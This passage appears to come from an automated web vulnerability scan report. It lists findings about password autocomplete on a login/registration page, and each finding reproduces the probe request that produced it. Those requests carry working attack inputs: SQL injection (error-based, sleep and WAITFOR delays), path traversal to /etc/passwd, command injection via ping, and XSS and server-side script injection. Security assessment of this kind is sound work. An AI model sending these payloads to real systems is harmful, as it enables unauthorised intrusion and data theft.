       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.50. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.51. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.52. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.53. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.54. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.55. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.56. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=*/netsparker(0x000052)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000052)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.57. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.58. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.59. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.60. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=body%7Bx:expression(netsparker(0x000041))%7D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000041))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.61. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.62. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.63. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.64. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.65. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1);WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.66. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.67. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
